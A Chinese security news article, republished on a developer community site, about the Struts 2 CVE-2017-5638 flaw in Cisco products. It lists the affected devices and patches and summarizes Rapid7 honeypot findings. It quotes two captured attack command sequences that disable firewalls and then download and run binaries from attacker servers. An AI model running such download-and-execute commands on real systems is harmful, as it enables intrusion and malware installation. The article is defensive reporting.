思科多款统一通信设备存在Struts 2漏洞 美安全公司Rapid7称捕获了两次来自中国的攻击-阿里云开发者社区

开发者社区> 安全> 正文
登录阅读全文

思科多款统一通信设备存在Struts 2漏洞 美安全公司Rapid7称捕获了两次来自中国的攻击

简介:

周五,思科对客户发出通知称,至少一部分思科产品中存在 Apache Struts2命令执行漏洞 。在过去几天内,该漏洞被攻击者大肆利用。

思科公开了存在Struts 2漏洞的产品列表

经证实,该漏洞已影响到思科身份服务引擎(ISE)、主要服务目录虚拟设备以及统一SIP代理软件。思科已公布了几十个未受影响的产品清单,但很多产品仍在调查中。

Network and Content Security Devices

Cisco Identity Services Engine (ISE)   CSCvd49829

补丁有效:1.2, 1.3, 1.4, and 2.x hot patches (18-March-2017)

Network Management and Provisioning

Cisco Prime Service Catalog Appliance and Virtual Appliance  CSCvd49816

补丁有效:

psc-patch-12.0.0-1 (13-March-2017) 
pscva-patch-12.0.0-1 (14-March-2017)

Voice and Unified Communications Devices

  • Cisco Emergency ResponderCSCvd51442
  • Cisco Unified Communications Manager IM & Presence Service (formerly CUPS)CSCvd49842
  • Cisco Unified Communications Manager Session Management EditionCSCvd49840
  • Cisco Unified Communications ManagerCSCvd49840
  • Cisco Unified Contact Center EnterpriseCSCvd51210
  • Cisco Unified Intelligent Contact Management EnterpriseCSCvd51210
  • Cisco Unified SIP Proxy SoftwareCSCvd49788
  • Cisco Unity Connection

思科称尚未发现针对其产品攻击的证据

虽然漏洞被积极利用来传播恶意软件,思科尚未发现任何针对其产品攻击的证据。尽管如此,该公司已警示用户,该漏洞的利用程序是公开的。

Struts 2.3.5至2.3.31和Struts 2.5至2.5.10受到了该安全漏洞(CVE-2017-5638)的影响。3月6日,思科发布了Struts 2.3.32和2.5.10.1。第一轮攻击是在概念证明(PoC)利用程序发布后的一天内被发现的。

该漏洞存在于Jakarta Multipart parser分析器内,是因为对Content-Type头值处理不当造成的。未经身份验证的远程攻击者可利用该漏洞通过发送特制的HTTP请求执行任意命令。

研究人员观察到,漏洞利用程序的目标是确定脆弱系统和攻击者试图提交各种类型的恶意软件(包括IRC保镖和DoS/DDoS僵尸)的系统。

思科和其他安全厂商已开始发布防火墙规则来阻止这种攻击。绿盟科技提供了Struts2漏洞 免费在线扫描工具 ,Tinfoil Security公司也提供了 一款在线工具 ,允许网站所有者检查其网站是否受到CVE-2017-5638漏洞的影响。

Rapid7 给出分析称两次恶意请求来自中国

Rapid7一直在监测攻击,并根据蜜罐数据确认了大部分恶意流量来自位于中国的两台机器。

Struts%20Requests.png

第一次匹配到的恶意请求是在 UTC时间3月7日周二下午15:36 ,恶意请求来自中国郑州的一台主机。 Both were HTTP GET requests for /index.aciton (misspelled) and the commands that they executed would have caused a vulnerable target to download binaries from the attacking server. Here is an example of the commands that were sent as a single string in the Content-Type value:

  1. cd /dev/shm;
  2. wget http://XXX.XXX.XXX.92:92/lmydess;
  3. chmod 777 lmydess;
  4. ./lmydess;
研究员抽取了一部分代码,以便阅读。这是相当标准的注入命令或 针对web 服务器的远程代码执行攻击。基本上,是让一些地方可写,下载代码,确保其可执行文件,并运行它。

之后恶意请求流量似乎停了,直到UTC时间3月8日周四上午09:02,我们捕获了一次来自中国上海主机的攻击。 The requests differed from the previous attacks. The new attacks were HTTP POSTs to a couple different paths and attempted to execute different commands on the victim:

  1. /etc/init.d/iptables stop;
  2. service iptables stop;
  3. SuSEfirewall2 stop;
  4. reSuSEfirewall2 stop;
  5. cd /tmp;
  6. wget -c http://XXX.XXX.XXX.26:9/7;
  7. chmod 777 7;
  8. ./7;

Rapid7是做什么的

Rapid7是一家互联网安全公司。2015 年 7 月,首次公开发行股票。年收入据称超过1亿美金。在 2016 年,他们推出新的产品InsightIDR。

独立研究员Matthew Kienow和来自Rapid7的Tod Beardsly、Deral Heiland分析了9个厂商的网络管理系统,包括Spiceworks、Ipswitch、Castle Rock、ManageEngine、CloudView、Paessler、Opmantek、Netikus和Opsview。

QQ%E6%88%AA%E5%9B%BE20160909153600.png




原文发布时间:2017年3月24日
本文由:securityWeek 发布,版权归属于原作者
原文链接:http://toutiao.secjia.com/cisco-unified-communications-devices-struts-2-vulnerability#
本文来自云栖社区合作伙伴安全加,了解相关信息可以关注安全加网站 

版权声明:本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《阿里云开发者社区用户服务协议》和《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。

分享:
+ 订阅

云安全开发者的大本营

其他文章